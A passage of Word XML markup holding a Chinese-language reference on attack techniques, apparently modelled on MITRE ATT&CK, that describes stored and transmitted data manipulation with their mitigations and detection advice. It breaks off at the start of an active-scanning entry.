      <w:r w:rsidRPr="00A65911">
        <w:t>存储的数据来</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响业务流程、组织理解和决策。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EEA34" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存储的数据可以包括多种文件格式，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，数据库，存储的电子邮件和自定义文件格式。修改的类型及其所产生的影响取决于数据的类型以及攻击者的目的和目标。对于复杂的系统，攻击者可能需要特殊的专业知识，并可能需要通过长期的信息收集活动获得与系统相关的专门软件，从而产生预期的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB8B14" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="403DDA4D" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2AD37554" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0D48E31F" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="477D1EE2" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FECA519" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId269" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>敏感信息加密</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548683DA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑对重要信息进行加密，从而降低攻击者执行定制数据修改的能力。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="7E44B77A" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26169207" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId270" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>远程数据存储</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AECECC9" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>容灾计划，包括可用于恢复组织数据的定期数据备份过程。确保备份数据存储在系统之外并且受到保护，以防攻击者使用常见方法访问并操纵备份</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="4F967ADD" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D3FC912" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031173DC" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保对</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>重要信息</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>资源</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>最小权限原则，从而减少数据操纵风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AF4561D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A98819B" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B106CC" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的话</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，检查重要文件哈希和位置并</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>查看是否有修改为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>意外</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A6C451" w14:textId="20AC66F1" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传输</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidR="00567ECD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操纵</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="06CA0B4B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40C6414D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3380E">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> T1493</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C3F3B4" w14:textId="5E2AF731" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4868F3DE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3380E">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D605D51" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3380E">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74E8EC2D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3380E">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包，网络协议分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B96F03" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B3380E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>影响类型：完整性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E498E3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B3380E">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3380E">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="101FF306" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00AE4CD6" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BAD831" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00494B3A" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会改变前往存储或其他系统的数据，以便操纵外部结果或隐藏活动。通过操纵传输的数据，攻击者可能会尝试影响业务流程，组织理解和决策制定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F048D50" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过网络连接进行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能被</w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截和更改信息的系统进程之间进行操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改的类型及其将产生的影响取决于目标传输机制以及对手的目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和目标。</w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00494B3A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于复杂的系统，攻击者可能需要特殊的专业知识，并且可能需要访问与系统相关的专用软件，这些软件通常通过长时间的信息收集活动获得，以便产生预期的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE3B22" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2406"/>
        <w:gridCol w:w="7330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="5068A80E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="731F77F7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="194A3F3C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="00738680" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2406" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A03F0F5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E3693">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密敏感信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="643FD8F8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E3693">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>加密所有重要数据流，以减少定制修改对传输中数据的影响。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AFB9F42" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5219A11C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00F815A5">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有适当的工具，在网络通过时检测数据的操纵可能是困难的。</w:t>
      </w:r>
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某些情况下，完整性验证检查（例如文件哈希）可以在关键文件传输网络时使用。</w:t>
      </w:r>
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于涉及数据传输的一些关键过程，手动或完整性检查对于识别操纵数据可能是有用的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4380DB" w14:textId="02ADFB88" w:rsidR="00A0413E" w:rsidRDefault="00D6184F" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>技术信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A597AD" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主动扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1688" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8048"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D6184F" w14:paraId="161FC2EB" w14:textId="77777777" w:rsidTr="00DD12CC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8048" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BB8BED5" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00DD12CC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r>
              <w:t>T1254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097DDC4E" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00DD12CC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C795788" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00DD12CC">
            <w:pPr>
